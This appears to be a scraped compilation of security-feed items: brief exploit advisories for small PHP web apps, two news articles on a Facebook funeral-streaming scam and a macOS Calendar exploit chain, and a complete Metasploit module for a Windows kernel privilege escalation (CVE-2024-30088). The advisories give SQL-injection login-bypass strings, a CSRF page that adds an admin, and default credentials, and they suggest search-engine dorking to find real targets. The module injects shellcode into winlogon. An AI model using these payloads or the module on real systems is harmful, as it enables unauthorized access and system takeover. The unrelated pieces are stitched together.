Online Bus Ticket Booking Website version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : online bus ticket booking Website v1.0 Auth By PAss Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202406/kashipara.com_online-bus-ticket-booking-.zip           |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] User : 'or''='@gmail.com & PAss = 'or''='[+] http://127.0.0.1/online-bus-ticket-booking-Website/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Bus Ticket Booking Website 1.0 SQL Injection

Nipah Virus Testing Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 Auth By Pass Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/nipah-tms/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Nipah Virus Testing Management System 1.0 SQL Injection

Membership Management System version 1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Membership Management System 1.1 Auth By Pass Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://codeastro.com/membership-management-system-in-php-with-source-code/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/Membership/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Membership Management System 1.1 SQL Injection

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : HYSCALE System v1.9 CSRF add admin Vulnerability                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely add new admin.

[+] Line 10 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Registration Form</title>  
</head>  
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

        <label for="username">Username:</label>  
    <input type="text" name="username" id="username" required><br><br>

    <label for="email">Email:</label>  
    <input type="email" name="email" id="email" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" name="password" id="password" required><br><br>

    <label for="dob">Date of Birth:</label>  
    <input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

    <label>Gender:</label><br>  
    <input type="radio" name="gender" value="Male" id="male" required>  
    <label for="male">Male</label><br>  
    <input type="radio" name="gender" value="Female" id="female">  
    <label for="female">Female</label><br><br>

    <label for="usertype">User Type:</label>  
    <select name="usertype" id="usertype" required>  
        <option value="admin">Admin</option>  
        <option value="user">User</option>  
        <option value="guest">Guest</option>  
    </select><br><br>

    <label for="target_sales">Target Sales:</label>  
    <input type="text" name="target_sales" id="target_sales" required><br><br>

    <input type="submit" value="Submit">

</form>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

Furniture Master version 2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Furniture master v2 Sql injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_furniture-master-2-zip.zip      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /prodInfo.php?prodId=1 <===== inject here[+] http://127.0.0.1/furniture_master/prodInfo.php?prodId=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Furniture Master 2 SQL Injection

Food Ordering and Table Reservation System for Restaurants version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: murja      Password: 123[+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Food Ordering And Table Reservation System For Restaurants 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/bpmsp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Beauty Parlour And Saloon Management System 1.1 Insecure Settings

Scammers are flooding Facebook with groups that purport to offer video streaming of funeral services for the recently deceased. Friends and family who follow the links for the streaming services are then asked to cough up their credit card information. Recently, these scammers have branched out into offering fake streaming services for nearly any kind of event advertised on Facebook. Here's a closer look at the size of this scheme, and some findings about who may be responsible.

Scammers are flooding **Facebook** with groups that purport to offer video streaming of funeral services for the recently deceased. Friends and family who follow the links for the streaming services are then asked to cough up their credit card information. Recently, these scammers have branched out into offering fake streaming services for nearly any kind of event advertised on Facebook. Here’s a closer look at the size of this scheme, and some findings about who may be responsible.

One of the many scam funeral group pages on Facebook. Clicking to view the “live stream” of the funeral takes one to a newly registered website that requests credit card information.

KrebsOnSecurity recently heard from a reader named George who said a friend had just passed away, and he noticed that a Facebook group had been created in that friend’s memory. The page listed the correct time and date of the funeral service, which it claimed could be streamed over the Internet by following a link that led to a page requesting credit card information.

“After I posted about the site, a buddy of mine indicated \[the same thing\] happened to her when her friend passed away two weeks ago,” George said.

Searching Facebook/Meta for a few simple keywords like “funeral” and “stream” reveals countless funeral group pages on Facebook, some of them for services in the past and others erected for an upcoming funeral.

All of these groups include images of the deceased as their profile photo, and seek to funnel users to a handful of newly-registered video streaming websites that require a credit card payment before one can continue. Even more galling, some of these pages request donations in the name of the deceased.

It’s not clear how many Facebook users fall for this scam, but it’s worth noting that many of these fake funeral groups attract subscribers from at least some of the deceased’s followers, suggesting those users have subscribed to the groups in anticipation of the service being streamed. It’s also unclear how many people end up missing a friend or loved one’s funeral because they mistakenly thought it was being streamed online.

One of many look-alike landing pages for video streaming services linked to scam Facebook funeral groups.

George said their friend’s funeral service page on Facebook included a link to the supposed live-streamed service at **livestreamnow\[.\]xyz**, a domain registered in November 2023.

According to DomainTools.com, the organization that registered this domain is called “**apkdownloadweb**,” is based in Rajshahi, Bangladesh, and uses the DNS servers of a Web hosting company in Bangladesh called **webhostbd\[.\]net**.

A search on “apkdownloadweb” in DomainTools shows three domains registered to this entity, including **live24sports\[.\]xyz** and **onlinestreaming\[.\]xyz**. Both of those domains also used webhostbd\[.\]net for DNS. Apkdownloadweb has a Facebook page, which shows a number of “live video” teasers for sports events that have already happened, and says its domain is **apkdownloadweb\[.\]com**.

Livestreamnow\[.\]xyz is currently hosted at a Bangladeshi web hosting provider named **cloudswebserver\[.\]com**, but historical DNS records show this website also used DNS servers from webhostbd\[.\]net.

The Internet address of livestreamnow\[.\]xyz is **148.251.54.196**, at the hosting giant Hetzner in Germany. DomainTools shows this same Internet address is home to nearly 6,000 other domains (.CSV), including hundreds that reference video streaming terms, like **watchliveon24\[.\]com** and **foxsportsplus\[.\]com**.

There are thousands of domains at this IP address that include or end in the letters “**bd**,” the country code top-level domain for Bangladesh. Although many domains correspond to websites for electronics stores or blogs about IT topics, just as many contain a fair amount of placeholder content (think “lorem ipsum” text on the “contact” page). In other words, the sites appear legitimate at first glance, but upon closer inspection it is clear they are not currently used by active businesses.

The passive DNS records for 148.251.54.196 show a surprising number of results that are basically two domain names mushed together. For example, there is **watchliveon24\[.\]com.playehq4ks\[.\]com**, which displays links to multiple funeral service streaming groups on Facebook.

Another combined domain on the same Internet address — livestreaming24\[.\]xyz.allsportslivenow\[.\]com — lists dozens of links to Facebook groups for funerals, but also for virtually all types of events that are announced or posted about by Facebook users, including graduations, concerts, award ceremonies, weddings, and rodeos.

Even community events promoted by state and local police departments on Facebook are fair game for these scammers. A Facebook page maintained by the police force in Plympton, Mass. for a town social event this summer called Plympton Night Out was quickly made into two different Facebook groups that informed visitors they could stream the festivities at either **espnstreamlive\[.\]co** or **skysports\[.\]live**.

**WHO’S BEHIND THE FAKEBOOK FUNERALS?**

Recall that the registrant of livestreamnow\[.\]xyz — the bogus streaming site linked in the Facebook group for George’s late friend — was an organization called “Apkdownloadweb.” That entity’s domain — **apkdownloadweb\[.\]com** — is registered to a **Mazidul Islam** in Rajshahi, Bangladesh (this domain is also using Webhostbd\[.\]net DNS servers).

Mazidul Islam’s LinkedIn page says he is the organizer of a now defunct IT blog called gadgetsbiz\[.\]com, which DomainTools finds was registered to a **Mehedi Hasan** from Rajshahi, Bangladesh.

To bring this full circle, DomainTools finds the domain name for the DNS provider on all of the above-mentioned sites  — webhostbd\[.\]net — was originally registered to a **Md Mehedi**, and to the email address **webhostbd.net@gmail.com** (“MD” is a common abbreviation for Muhammad/Mohammod/Muhammed).

A search on that email address at Constella finds a breached record from the data broker Apollo.io saying its owner’s full name is **Mohammod Mehedi Hasan.** Unfortunately, this is not a particularly unique name in that region of the world.

But as luck would have it, sometime last year the administrator of apkdownloadweb\[.\]com managed to infect their Windows PC with password-stealing malware. We know this because the raw logs of data stolen from this administrator’s PC were indexed by the breach tracking service Constella Intelligence \[full disclosure: As of this month, Constella is an advertiser on this website\].

These so-called “stealer logs” are mostly generated by opportunistic infections from information-stealing trojans that are sold on cybercrime markets. A typical set of logs for a compromised PC will include any usernames and passwords stored in any browser on the system, as well as a list of recent URLs visited and files downloaded.

Malware purveyors will often deploy infostealer malware by bundling it with “cracked” or pirated software titles. Indeed, the stealer logs for the administrator of apkdownloadweb\[.\]com show this user’s PC became infected immediately after they downloaded a booby-trapped mobile application development toolkit.

Those stolen credentials indicate Apkdownloadweb\[.\]com is maintained by a 20-something native of Dhaka, Bangladesh named **Mohammod Abdullah Khondokar**.

The “browser history” folder from the admin of Apkdownloadweb shows Khondokar recently left a comment on the Facebook page of Mohammod Mehedi Hasan, and Khondokar’s Facebook profile says the two are friends.

Neither MD Hasan nor MD Abdullah Khondokar responded to requests for comment. KrebsOnSecurity also sought comment from Meta.

Scam ‘Funeral Streaming’ Groups Thrive on Facebook

A researcher bypassed the Calendar sandbox, Gatekeeper, and TCC in a chain attack that allowed for wanton theft of iCloud photos.

Source: Bjanka Kadic via Alamy Stock Photo

A zero-click chain of critical-, medium-, and low-severity vulnerabilities in macOS could have allowed attackers to undermine macOS's brand name security protections and ultimately compromise victims' iCloud data.

The story begins with a lack of sanitization of files attached to Calendar events. From there, researcher Mikko Kenttälä discovered he could achieve remote code execution (RCE) on targeted systems, and access sensitive data — in his experiments, he used iCloud Photos. No step in the process required any user interaction, and neither Apple's Gatekeeper nor Transparency, Consent, and Control (TCC) protections could stop it.

**Zero-Click Exploit Chain in macOS**

The all-important first bug in the chain — CVE-2022-46723 — was awarded a "critical" 9.8 out of 10 CVSS score back in February 2023.

It wasn't just dangerous, it was simple to exploit. An attacker could simply send the victim a calendar invite containing a malicious file. Because macOS failed to properly vet the filename, the attacker could name it arbitrarily, to variously interesting effect.

For example, they could name it with the goal of deleting a specific, preexisting system file. If they gave it the same name as an existing file, then deleted the calendar event through which they delivered it, the system would delete both the malicious file and the original file it mimicked, for whatever reason.

More dangerous was the potential for an attacker to perform path traversal, naming their attachment in such a way that would allow it to escape the Calendar's sandbox, where attached files are supposed to be saved, to other locations on the system.

Kenttälä used this arbitrary file write power to take advantage of an operating system upgrade (at the time of discovery, macOS Ventura was about to be released). First, he created a file mimicking a Siri-suggested repeating calendar event, hiding alerts that would trigger the execution of further files during a migration. One of those follow-on files was responsible for migrating old calendar data to the new system. Another allowed him to mount a network share from Samba, the open source Server Message Block (SMB) protocol, without triggering a security flag. Another two files triggered the launch of a malicious app.

**Undermining Apple's Native Security Controls**

The malicious app snuck in without raising any alarm, thanks to a bypass in macOS's Gatekeeper security feature — the thing standing in the way of Mac systems and untrusted apps. Labeled CVE-2023-40344, it was assigned a medium-severity 5.5 out of 10 CVSS rating back in January 2024.

Gatekeeper, though, wasn't the only signature macOS security feature undermined in the attack. Using a script launched by the malicious app, Kenttälä successfully replaced the configuration file associated with iCloud Photos with a malicious one. This re-pointed Photos to a custom path, outside of the protection of TCC, the protocol macOS uses to ensure apps don't improperly access sensitive data and resources. The re-pointing, CVE-2023-40434 — with a "low" 3.3 CVSS severity score — opened the door to wanton theft of photos, which could be exfiltrated to foreign servers with "trivial modifications."

"MacOS's Gatekeeper and TCC are critical for ensuring only trusted software is installed and managing access to sensitive data," explains Callie Guenther, senior manager of cyber threat research for Critical Start. "However, the zero-click vulnerability in macOS Calendar showed how attackers can bypass these protections by exploiting sandbox processes." Guenther notes, though, that macOS isn't uniquely vulnerable to these types of attacks: "Similar vulnerabilities exist in Windows, where Device Guard and SmartScreen can be bypassed using techniques like privilege escalation or exploiting kernel vulnerabilities."

For example, she adds, "Attackers have used DLL hijacking or sandbox escape methods to defeat Windows security controls. Both operating systems rely on robust security frameworks, but persistent adversaries — especially APT groups — find ways to bypass these defenses."

Apple acknowledged and patched the many vulnerabilities in the exploit chain at various points between October 2022 and September 2023.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Zero-Click RCE Bug in macOS Calendar Exposes iCloud Data

CVE-2024-30088 is a Windows kernel elevation of privilege vulnerability which affects many recent versions of Windows 10, Windows 11 and Windows Server 2022. The vulnerability exists inside the function called AuthzBasepCopyoutInternalSecurityAttributes specifically when the kernel copies the _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION of the current token object to user mode. When the kernel performs the copy of the SecurityAttributesList, it sets up the list of the SecurityAttributes structure directly to the user supplied pointed. It then calls RtlCopyUnicodeString and AuthzBasepCopyoutInternalSecurityAttributeValues to copy out the names and values of the SecurityAttribute leading to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Exploit::Local::WindowsKernel  include Msf::Post::File  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  include Msf::Post::Windows::Version  include Msf::Exploit::Retry  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes',        'Description' => %q{          CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,          Windows 11 and Windows Server 2022.          The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when          the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the          kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure          directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and          `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading          to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.        },        'Author' => [          'tykawaii98', # PoC (Bùi Quang Hiếu)          'jheysel-r7' # msf module        ],        'References' => [          [ 'URL', 'https://github.com/tykawaii98/CVE-2024-30088'],          [ 'CVE', '2024-30038']        ],        'License' => MSF_LICENSE,        'Platform' => 'win',        'Privileged' => true,        'SessionTypes' => [ 'meterpreter' ],        'Arch' => [ ARCH_X64 ],        'Targets' => [          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]        ],        'DisclosureDate' => '2024-06-11',        'Notes' => {          'Stability' => [ CRASH_SAFE, ],          'SideEffects' => [ ARTIFACTS_ON_DISK, ],          'Reliability' => [UNRELIABLE_SESSION] # It should return a session on the first run although has the potential to fail.        },                                      # After the first run the original session will usually die if the module is rerun against the same session.        'Compat' => {          'Meterpreter' => {            'Commands' => %w[              stdapi_sys_process_get_processes              stdapi_railgun_api              stdapi_sys_process_memory_allocate              stdapi_sys_process_memory_protect              stdapi_sys_process_memory_read              stdapi_sys_process_memory_write            ]          }        }      )     )  end  def target_compatible?(version)    # NOTE: Win10_1607 = Server2016 and Win10_1809 = Server2019. Both Server and Desktop version are supposed to be affected.    return true if version.build_number.between?(Msf::WindowsVersion::Win10_1507, Rex::Version.new('10.0.10240.20680')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_1607, Rex::Version.new('10.0.14393.7070')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_1809, Rex::Version.new('10.0.17763.5936')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_21H2, Rex::Version.new('10.0.19044.4529')) ||                   version.build_number.between?(Msf::WindowsVersion::Win10_22H2, Rex::Version.new('10.0.19045.4529')) ||                   version.build_number.between?(Msf::WindowsVersion::Win11_21H2, Rex::Version.new('10.0.22000.3019')) ||                   version.build_number.between?(Msf::WindowsVersion::Win11_22H2, Rex::Version.new('10.0.22621.3737')) ||                   version.build_number.between?(Msf::WindowsVersion::Win11_23H2, Rex::Version.new('10.0.22631.3737')) ||                   version.build_number.between?(Msf::WindowsVersion::Server2022, Rex::Version.new('10.0.20348.2522')) ||                   version.build_number.between?(Msf::WindowsVersion::Server2022_23H2, Rex::Version.new('10.0.25398.950'))    false  end  def check    return Exploit::CheckCode::Safe('Non Windows systems are not affected') unless session.platform == 'windows'    version = get_version_info    return Exploit::CheckCode::Appears("Version detected: #{version}") if target_compatible?(version)    CheckCode::Safe("Version detected: #{version}")  end  def get_winlogon_pid    processes = client.sys.process.get_processes    winlogon_pid = nil    processes.each do |process|      if process['name'].downcase == 'winlogon.exe'        winlogon_pid = process['pid']        break      end    end    winlogon_pid  end  def get_winlogon_handle    pid = session.sys.process.getpid    process_handle = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)    address = process_handle.memory.allocate(8)    thread = execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2024-30088', 'CVE-2024-30088.x64.dll'),      address,      pid    )    calls = [      ['kernel32', 'WaitForSingleObject', [ thread.handle, 20000 ] ],      ['kernel32', 'GetExitCodeThread', [ thread.handle, 4 ] ],    ]    results = session.railgun.multi(calls)    winlogon_handle = nil    if results.last['lpExitCode'] == 0      print_good('The exploit was successful, reading SYSTEM token from memory...')      current_memory = process_handle.memory.read(address, 8)      winlogon_handle = current_memory.unpack('Q<').first    end    session.railgun.kernel32.VirtualFree(address, 0, MEM_RELEASE)    winlogon_handle  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    version = get_version_info    unless target_compatible?(version)      fail_with(Failure::NoTarget, "The exploit does not support this version of Windows: #{version}")    end    winlogon_handle = get_winlogon_handle    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon handle') unless winlogon_handle    print_good("Successfully stole winlogon handle: #{winlogon_handle}")    winlogon_pid = get_winlogon_pid    fail_with(Failure::UnexpectedReply, 'Unable to retrieve the winlogon pid') unless winlogon_pid    print_good("Successfully retrieved winlogon pid: #{winlogon_pid}")    host = session.sys.process.new(winlogon_pid, winlogon_handle)    shellcode = payload.encoded    shell_addr = host.memory.allocate(shellcode.length)    host.memory.protect(shell_addr)    if host.memory.write(shell_addr, shellcode) < shellcode.length      fail_with(Failure::UnexpectedReply, 'Failed to write shellcode')    end    vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{winlogon_pid})")    thread = host.thread.create(shell_addr, 0)    unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)      fail_with(Failure::UnexpectedReply, 'Unable to create thread')    end  endend

Tag

#windows